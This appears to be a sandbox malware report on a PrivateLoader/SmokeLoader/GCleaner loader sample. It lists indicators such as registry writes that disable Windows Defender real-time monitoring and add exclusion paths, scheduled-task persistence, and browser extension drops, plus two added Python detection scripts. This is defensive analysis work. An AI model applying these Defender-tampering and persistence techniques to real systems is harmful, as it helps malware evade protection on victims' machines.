Malware Analysis Report

2024-11-15 09:02

Sample ID 241110-fn9vyszfln
Target 548bdfcb86652c14659e019e9f838f42
SHA256 4c1fc6a16f378978da7c35f36525a4397a983255020fb709d0ad8cbe3f1e38e5
Tags
defense_evasion discovery evasion execution spyware stealer trojan persistence vmprotect smokeloader backdoor gcleaner loader privateloader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1 (Detonation Overview, Signatures)

Analysis: behavioral11, behavioral12, behavioral13, behavioral14, behavioral5, behavioral3, behavioral4, behavioral8, behavioral2, behavioral7, behavioral10, behavioral6, behavioral1, behavioral9 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
10/10

SHA256

4c1fc6a16f378978da7c35f36525a4397a983255020fb709d0ad8cbe3f1e38e5

Threat Level: Known bad

The file 548bdfcb86652c14659e019e9f838f42 was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution spyware stealer trojan persistence vmprotect smokeloader backdoor gcleaner loader privateloader

Smokeloader family

Gcleaner family

Privateloader family

Modifies Windows Defender Real-time Protection settings

GCleaner

Windows security bypass

SmokeLoader

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

VMProtect packed file

Checks BIOS information in registry

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Indirect Command Execution

Drops Chrome extension

Legitimate hosting services abused for malware hosting/C2

Drops desktop.ini file(s)

Checks installed software on the system

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates processes with tasklist

Drops file in Windows directory

Drops file in Program Files directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Checks SCSI registry key(s)

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 05:02

Signatures

Privateloader family

privateloader

VMProtect packed file

vmprotect
Description Indicator Process Target
(1 match; all columns N/A)

Unsigned PE

Description Indicator Process Target
(8 matches; all columns N/A)

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win7-20240729-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A

Indirect Command Execution

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\vWebWLI.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
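Two of the dropped executables above (vWebWLI.exe and EMVGmrK.exe) create and modify C:\Windows\System32\GroupPolicy\Machine\Registry.pol and gpt.ini. Machine\Registry.pol is the local Group Policy registry settings file in the PReg format ([MS-GPREG]): the 4-byte magic "PReg", a version DWORD of 1, then a sequence of UTF-16LE records of the form [key;value;type;size;data], applied to HKLM. Parsing it is the quickest way to see which policies a sample pushed. The parser below is an added example, not code from this report or from the sandbox vendor. The report does not show the real file's contents, so SAMPLE_POL is constructed here: the first entry assumes the file carries the same DisableRealtimeMonitoring policy the sample set through reg.exe, and the second is an unrelated REG_SZ entry added only to exercise string decoding.

```python
"""Added example, not part of the sandbox report: a parser for the Group Policy
Registry.pol ("PReg") file format, the file the sample writes at
C:\\Windows\\System32\\GroupPolicy\\Machine\\Registry.pol. The report does not show
that file's contents, so SAMPLE_POL below is constructed: one entry mirrors the
DisableRealtimeMonitoring policy the sample set through reg.exe, the other is an
unrelated REG_SZ entry added only to exercise string decoding."""
import struct
from dataclasses import dataclass

REG_SZ, REG_EXPAND_SZ, REG_DWORD = 1, 2, 4
PREG_MAGIC, PREG_VERSION = b"PReg", 1
DEFENDER_POLICY_ROOT = "SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER"


@dataclass
class PolEntry:
    key: str      # relative to the hive (HKLM for Machine\Registry.pol)
    value: str    # value name; names starting with ** are PReg control records
    type: int     # REG_* type code
    data: object  # int for REG_DWORD, str for REG_SZ/REG_EXPAND_SZ, hex otherwise


def _utf16(s: str) -> bytes:
    return s.encode("utf-16-le")


def _read_utf16z(buf: bytes, pos: int):
    """Read a NUL-terminated UTF-16LE string at pos; return (text, next offset)."""
    end = pos
    while True:
        if end + 2 > len(buf):
            raise ValueError(f"unterminated string at offset {pos}")
        if buf[end:end + 2] == b"\x00\x00":
            return buf[pos:end].decode("utf-16-le"), end + 2
        end += 2


def _expect(buf: bytes, pos: int, ch: str) -> int:
    """Consume one UTF-16LE delimiter character ('[', ';' or ']')."""
    if buf[pos:pos + 2] != _utf16(ch):
        raise ValueError(f"expected {ch!r} at offset {pos}")
    return pos + 2


def decode_data(rtype: int, raw: bytes):
    if rtype == REG_DWORD and len(raw) == 4:
        return struct.unpack("<I", raw)[0]
    if rtype in (REG_SZ, REG_EXPAND_SZ):
        return raw.decode("utf-16-le").rstrip("\x00")
    return raw.hex()


def parse_registry_pol(buf: bytes):
    """Parse a PReg v1 file: 8-byte header, then [key;value;type;size;data] records."""
    if len(buf) < 8 or buf[:4] != PREG_MAGIC or struct.unpack_from("<I", buf, 4)[0] != PREG_VERSION:
        raise ValueError("not a PReg version 1 file")
    pos, entries = 8, []
    while pos < len(buf):
        pos = _expect(buf, pos, "[")
        key, pos = _read_utf16z(buf, pos)
        pos = _expect(buf, pos, ";")
        value, pos = _read_utf16z(buf, pos)
        pos = _expect(buf, pos, ";")
        rtype = struct.unpack_from("<I", buf, pos)[0]
        pos = _expect(buf, pos + 4, ";")
        size = struct.unpack_from("<I", buf, pos)[0]
        pos = _expect(buf, pos + 4, ";")
        raw, pos = buf[pos:pos + size], pos + size
        pos = _expect(buf, pos, "]")
        entries.append(PolEntry(key, value, rtype, decode_data(rtype, raw)))
    return entries


def defender_policy_findings(entries):
    """Real registry values (not ** control records) under the Defender policy tree."""
    return [e for e in entries
            if e.key.upper().startswith(DEFENDER_POLICY_ROOT) and not e.value.startswith("**")]


def build_registry_pol(records) -> bytes:
    """Serialize (key, value, type, raw_data) tuples to PReg; used to construct the sample."""
    out = bytearray(PREG_MAGIC + struct.pack("<I", PREG_VERSION))
    for key, value, rtype, raw in records:
        out += _utf16("[") + _utf16(key) + b"\x00\x00" + _utf16(";")
        out += _utf16(value) + b"\x00\x00" + _utf16(";")
        out += struct.pack("<I", rtype) + _utf16(";") + struct.pack("<I", len(raw)) + _utf16(";")
        out += raw + _utf16("]")
    return bytes(out)


# Constructed sample file (see module docstring); not recovered from the sample.
SAMPLE_POL = build_registry_pol([
    ("Software\\Policies\\Microsoft\\Windows Defender\\Real-time Protection",
     "DisableRealtimeMonitoring", REG_DWORD, struct.pack("<I", 1)),
    ("Software\\Policies\\Microsoft\\Windows\\Control Panel\\Desktop",
     "Wallpaper", REG_SZ, _utf16("C:\\Windows\\Web\\img0.jpg\x00")),
])

if __name__ == "__main__":
    for e in defender_policy_findings(parse_registry_pol(SAMPLE_POL)):
        print(f"HKLM\\{e.key}\\{e.value} = {e.data!r} (type {e.type})")
```

On a live host, read the file with `open(path, "rb").read()` in place of SAMPLE_POL. Value names beginning with ** (for example **DeleteValues or **Del.Name) are PReg instructions rather than registry values, which is why the finding filter skips them; a malicious policy can use them to delete an administrator's own Defender settings, so listing them separately is worthwhile during triage.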

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\oWxSecJNU\rzgGdAH.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\YNUWFfCEdUiU2\wAkOdaJtnCYpI.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\caaUEUk.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\YNUWFfCEdUiU2\ioOgwSz.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\dQfGPhl.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\LsajhStaXkJRC\nLrhEQW.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\LsajhStaXkJRC\mbnEyUI.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\QpigBxJgKxUn\qLlRXkU.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
File created C:\Program Files (x86)\oWxSecJNU\AOatCp.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bJbhxhmwQPPePEjnjA.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\FTlmQXMDCFpnewAuq.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\zeLHdclAQOoTZxj.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\dBpreMcpfXbehynYz.job C:\Windows\SysWOW64\schtasks.exe N/A
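The most actionable indicators in this run are the Defender tampering rows above, where reg.exe sets DisableRealtimeMonitoring = 1 under the Policies key and registers eight randomly named directories as Exclusions\Paths through both the native and the Wow6432Node registry views, and the four .job files schtasks.exe writes to C:\Windows\Tasks for persistence. The script below is an added example, not code from this report or the sandbox vendor: it parses the report's own flattened "Description Indicator Process Target" rows, folds the two registry views together so each exclusion is counted once, and returns the tampering and persistence findings. The sample rows are copied verbatim from the behavioral11 tables; the only assumption is that the Target column is a single token, as it is (N/A) in every row of this report.

```python
"""Added example, not part of the sandbox report: parse this report's flattened
'Description Indicator Process Target' rows and derive two kinds of findings,
Windows Defender tampering (real-time protection disabled by policy, exclusion
paths added) and scheduled-task persistence (.job files written to
C:\\Windows\\Tasks). Assumption: the Target column is a single token, as it is
('N/A') in every row of this report."""
import re
from dataclasses import dataclass

# Description prefixes used by the report's tables, longest first so that a
# shorter prefix never wins over "Set value (int)" and friends.
DESCRIPTIONS = sorted(
    ["File created", "File opened for modification", "Key created", "Key opened",
     "Key value queried", "Set value (int)", "Set value (str)", "Set value (data)"],
    key=len, reverse=True)

# A Win32 (C:\...) or NT (\??\c:\...) path preceded by a space. The Process
# column is the last such path on the row, so a path embedded in the Indicator
# (e.g. ...\Exclusions\Paths\C:\ProgramData\...) is never mistaken for it.
PATH_START = re.compile(r" (?=[A-Za-z]:\\|\\\?\?\\)")

EXCLUSION_MARKER = "\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS\\"
RTP_DISABLE_KEY = ("\\REGISTRY\\MACHINE\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS DEFENDER"
                   "\\REAL-TIME PROTECTION\\DISABLEREALTIMEMONITORING")


@dataclass
class Row:
    description: str
    indicator: str
    process: str
    target: str


def parse_row(line: str) -> Row:
    """Split one flattened table row into its four columns."""
    for desc in DESCRIPTIONS:
        if line.startswith(desc + " "):
            break
    else:
        raise ValueError(f"unknown Description column: {line!r}")
    rest, target = line[len(desc) + 1:].rsplit(" ", 1)
    starts = [m.start() for m in PATH_START.finditer(rest)]
    if not starts:
        raise ValueError(f"no Process column: {line!r}")
    return Row(desc, rest[:starts[-1]], rest[starts[-1] + 1:], target)


def normalize_key(indicator: str) -> str:
    """Fold the 32-bit registry view (Wow6432Node) into the native key path, so
    the same exclusion written through both views is counted once."""
    return re.sub(r"\\Wow6432Node(?=\\)", "", indicator, flags=re.IGNORECASE)


def analyze(lines):
    """Return sorted findings: which process disabled real-time protection, which
    paths were excluded from Defender scanning, and which .job tasks were created."""
    found = {"realtime_disabled_by": set(), "exclusions": set(), "task_jobs": set()}
    for row in map(parse_row, lines):
        if row.description.startswith("Set value") and " = " in row.indicator:
            key, value = normalize_key(row.indicator).rsplit(" = ", 1)
            upper = key.upper()
            if upper == RTP_DISABLE_KEY and value == '"1"':
                found["realtime_disabled_by"].add(row.process)
            i = upper.find(EXCLUSION_MARKER)
            if i >= 0 and value == '"0"':
                # under Exclusions\Paths the value *name* is the excluded path
                found["exclusions"].add(key[i + len(EXCLUSION_MARKER):])
        elif row.description == "File created":
            p = row.indicator.upper()
            if p.startswith("C:\\WINDOWS\\TASKS\\") and p.endswith(".JOB"):
                found["task_jobs"].add(row.indicator.rsplit("\\", 1)[1])
    return {k: sorted(v) for k, v in found.items()}


# Rows copied verbatim from the behavioral11 tables of this report.
SAMPLE_ROWS = [
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0" C:\Windows\SysWOW64\reg.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0" C:\Windows\SysWOW64\reg.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0" C:\Windows\SysWOW64\reg.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0" C:\Windows\SysWOW64\reg.exe N/A',
    r'Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A',
    r'Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A',
    r'File created C:\Windows\Tasks\bJbhxhmwQPPePEjnjA.job C:\Windows\SysWOW64\schtasks.exe N/A',
    r'File created C:\Windows\Tasks\FTlmQXMDCFpnewAuq.job C:\Windows\SysWOW64\schtasks.exe N/A',
    r'File created C:\Windows\Tasks\zeLHdclAQOoTZxj.job C:\Windows\SysWOW64\schtasks.exe N/A',
    r'File created C:\Windows\Tasks\dBpreMcpfXbehynYz.job C:\Windows\SysWOW64\schtasks.exe N/A',
    r'File created C:\Program Files (x86)\YNUWFfCEdUiU2\wAkOdaJtnCYpI.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A',
]

if __name__ == "__main__":
    for name, items in analyze(SAMPLE_ROWS).items():
        print(name, items)
```

The same two checks translate directly to endpoint telemetry: registry value-set events (Sysmon Event ID 13) whose target is the Real-time Protection policy key or any value under Exclusions\Paths, with reg.exe as the writer, and file-create events for *.job under C:\Windows\Tasks. Because the sample writes every exclusion twice (native view and Wow6432Node), deduplicating on the normalized key is what keeps the exclusion list at eight paths rather than sixteen alerts.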

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
